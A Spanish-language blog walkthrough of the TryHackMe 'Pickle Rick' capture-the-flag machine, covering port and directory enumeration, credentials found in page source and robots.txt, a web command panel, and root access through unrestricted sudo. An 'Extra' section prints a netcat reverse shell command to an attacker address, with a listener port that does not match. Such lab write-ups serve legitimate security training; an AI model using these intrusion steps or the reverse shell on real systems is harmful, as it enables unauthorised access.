Pickle Rick – TryHackMe

Pickle Rick – TryHackMe

Siguiendo con la serie de write-ups de TryHackMe en este blog, hoy vamos a realizar la máquina Pickle Rick de TryHackMe, en ella, tendremos que conseguir los 3 ingredientes que necesita Rick

Dificultad asignada por THM: Fácil

La ip de la máquina en mi caso será: 10.10.236.177

Este artículo se divide en las siguientes fases:

Vamos a ello.

¿Cuál es el primer ingrediente que necesita Rick?

Primero lo primero, hagamos una breve enumeración con nmap para ver los puertos abiertos:

nmap -sC -sV -T4 -p- <IP>

Vemos que hay dos puertos abiertos, el 22 (SSH) y el 80 (HTTP) y aqui les debo una disculpa porque la captura del resultado desapareció :), así que, fuente: arial 12 (haha). En fin, sigamos.

Revisemos el apache:

En ella podemos ver un escrito de Rick pidiéndole ayuda a morty porque se ha convertido en un pepinillo y le inicie sesión en su computadora para que le diga los 3 ingredientes que faltan para volver a la normalidad, ah y que no recuerda su contraseña, pero si revisamos el código fuente, notaremos que, hay un nombre de usuario comentado:

Sin más que ver en esta página, hagamos una búsqueda de directorios y archivos con gobuster:

gobuster dir –url http://<IP> –wordlist /usr/share/wordlists/dirb/big.txt -x txt,php,html,phtml

Al finalizar la búsqueda, lo que más me llama la atención es el login.php (que tanto denied.php y portal.php redirigen a este) y que está el archivo robots.txt que, si lo miramos nos dará lo que parece ser la contraseña:

Ahora con estas posibles credenciales intentemos logearnos en /login.php, al hacerlo veremos que tenemos un panel de comandos:

Probemos listar el directorio actual:

Y mira, ya conseguimos el primer ingrediente, intentemos leerlo:

Bien, parece que comandos tales como “cat”, “head” o “tail”, están deshabilitados, peor si probamos con les si nos dejará leer el primer ingrediente:

¿Cuál es el segundo ingrediente que necesita Rick?

Después de revisar un poco el sistema me percaté que el segundo ingrediente está en /home/Rick, simplemente léelo con less:

¿Cuál es el tercer ingrediente que necesita Rick?

Lo más seguro es que el tercer ingrediente esté en el directorio /root, pero claro, no tenemos permisos para acceder a este, así que si hacemos un sudo -l para comprobar que podemos ejecutar como sudo nos llevaremos una agradable sorpresa:

Podemos hacer todo con el comando sudo, así que sencillamente listamos el directorio /root para saber el nombre del tercer ingrediente:

Y ahora lo leemos y ya estaría:

Extra

Cabe resaltar que, algunas veces puede ser bastante tedioso tener que escribir los comandos por ese panel, así que puedes hacer una shell reversa y así trabajar desde una terminal en condiciones, para ello puedes ejecutar el siguiente comando para poner a la escucha con netcat en tu máquina el puerto 9000 por ejemplo:

nc -lvp 9000 

Luego, en el panel de comandos ejecuta lo siguiente:

nc -e /bin/sh <TU_IP> 9001

Y así obtener una shell:

E igualmente escalar privilegios a root ya que tenemos no nos pide contraseña para ejecutar sudo:

Opinión personal:

  • Difícultad de acceso 4% 4%
  • Difícultad de escalación de privilegios 1% 1%

He hecho esta puntuación en opinión personal, basándome en estos valores:

Fácil: 1% – 30%

Medio: 31% – 70%

Difícil: 71% – 100%

Anuncio

Sobre el Autor

Martin Frias

Founder of Coldd Security

REDES SOCIALES

Newsletter

Estadísticas

  • 163.173
  • 55

TheHackerSnow

0

Share This